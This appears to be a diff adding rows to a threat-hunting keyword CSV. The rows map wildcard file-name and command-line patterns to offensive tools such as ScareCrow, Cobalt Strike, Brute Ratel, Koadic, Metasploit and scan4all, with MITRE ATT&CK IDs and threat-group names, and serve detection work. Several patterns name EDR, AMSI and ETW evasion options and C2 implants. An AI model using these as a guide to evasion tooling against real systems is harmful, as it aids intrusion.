+"*scan4all_windows_amd64.exe*","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","1","N/A","10","10","4058","489","2023-09-30T05:33:44Z","2022-06-20T03:11:08Z"
+"*scan4all-main*","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 
90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","1","N/A","10","10","4058","489","2023-09-30T05:33:44Z","2022-06-20T03:11:08Z"
+"*scanless*","offensive_tool_keyword","scanless","This is a Python 3 command-line utility and library for using websites that can perform port scans on your behalf","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0008","N/A","N/A","Information Gathering","https://github.com/vesche/scanless","1","0","N/A","N/A","10","1073","176","2023-08-07T15:12:42Z","2017-05-05T02:53:01Z"
+"*scanner/backdoor*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*scannerport.go -*","offensive_tool_keyword","GONET-Scanner","port scanner and arp discover in go","T1595","TA0001","N/A","N/A","Network Exploitation tools","https://github.com/luijait/GONET-Scanner","1","0","N/A","N/A","1","72","18","2022-03-10T04:35:58Z","2022-02-02T19:39:09Z"
+"*Scanners-Box*","offensive_tool_keyword","Scanners-Box","Scanners Box also known as scanbox. is a powerful hacker toolkit. which has collected more than 10 categories of open source scanners from Github. including subdomain. database. middleware and other modular design scanner etc. But for other Well-known scanning tools. such as nmap. w3af. brakeman. arachni. nikto. metasploit. 
aircrack-ng will not be included in the scope of collection.","T1190 - T1210.001 - T1595 - T1192","TA0007 - TA0002 - TA0008 - ","N/A","N/A","Exploitation tools","https://github.com/We5ter/Scanners-Box","1","0","N/A","N/A","10","7647","2353","2023-08-09T07:09:32Z","2016-12-24T16:07:50Z"
+"*ScanProcessForBadgerConfig*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A"
+"*ScanTCPImplant*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z"
+"*ScareCrow *-loader *","offensive_tool_keyword","ScareCrow","ScareCrow - Payload creation framework designed around EDR bypass.","T1548 - T1562 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/optiv/ScareCrow","1","0","N/A","N/A","10","2581","459","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z"
+"*ScareCrow* -encryptionmode *","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/optiv/ScareCrow","1","0","N/A","10","10","2581","459","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z"
+"*ScareCrow* -Evasion*","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/ScareCrow","1","0","N/A","10","10","2581","459","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z"
+"*ScareCrow* -Exec*","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - 
T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/ScareCrow","1","0","N/A","10","10","2581","459","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z"
+"*ScareCrow* -injection*","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/ScareCrow","1","0","N/A","10","10","2581","459","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z"
+"*ScareCrow* -Loader * ","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 
- T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/ScareCrow","1","0","N/A","10","10","2581","459","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z"
+"*ScareCrow* -noamsi*","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group 
- APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/ScareCrow","1","0","N/A","10","10","2581","459","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z"
+"*ScareCrow* -noetw*","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/ScareCrow","1","0","N/A","10","10","2581","459","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z"
+"*ScareCrow* -obfu*","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 
- T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/ScareCrow","1","0","N/A","10","10","2581","459","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z"
+"*ScareCrow*_darwin_amd64*","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/optiv/ScareCrow","1","1","N/A","10","10","2581","459","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z"
+"*ScareCrow*_windows_amd64.exe*","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/ScareCrow","1","1","N/A","10","10","2581","459","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z"
+"*ScareCrow*KnownDLL*","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - 
T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/ScareCrow","1","1","N/A","10","10","2581","459","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z"
+"*ScareCrow*ProcessInjection*","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/ScareCrow","1","1","N/A","10","10","2581","459","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z"
+"*ScareCrow*windows_amd64.exe*","offensive_tool_keyword","ScareCrow","ScareCrow - Payload creation framework designed around EDR 
bypass.","T1548 - T1562 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/optiv/ScareCrow","1","1","N/A","N/A","10","2581","459","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z"
+"*ScareCrow.cna*","offensive_tool_keyword","cobaltstrike","Cobalt Strike script for ScareCrow payloads intergration (EDR/AV evasion)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/GeorgePatsias/ScareCrow-CobaltStrike","1","1","N/A","10","10","438","68","2022-07-15T09:39:18Z","2021-06-24T10:04:01Z"
+"*ScareCrow.go*","offensive_tool_keyword","ScareCrow","ScareCrow - Payload creation framework designed around EDR bypass.","T1548 - T1562 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/optiv/ScareCrow","1","1","N/A","N/A","10","2581","459","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z"
+"*ScareCrow/Cryptor*","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 
- T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/ScareCrow","1","1","N/A","10","10","2581","459","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z"
+"*ScareCrow/limelighter*","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca 
- Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/ScareCrow","1","1","N/A","10","10","2581","459","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z"
+"*ScareCrow/Loader*","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/ScareCrow","1","1","N/A","10","10","2581","459","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z"
+"*ScareCrow/Utils*","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - 
T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/ScareCrow","1","1","N/A","10","10","2581","459","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z"
+"*ScareCrow_*_darwin_amd64*","offensive_tool_keyword","ScareCrow","ScareCrow - Payload creation framework designed around EDR bypass.","T1548 - T1562 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/optiv/ScareCrow","1","1","N/A","N/A","10","2581","459","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z"
